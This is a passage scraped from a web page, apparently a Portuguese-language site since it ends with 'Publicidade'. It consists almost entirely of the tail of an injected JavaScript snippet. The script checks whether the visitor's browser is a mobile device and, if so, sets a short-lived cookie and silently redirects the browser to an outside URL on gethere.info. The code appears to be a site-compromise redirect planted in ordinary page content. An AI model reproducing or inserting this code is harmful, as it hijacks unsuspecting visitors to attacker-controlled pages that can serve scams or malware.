)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade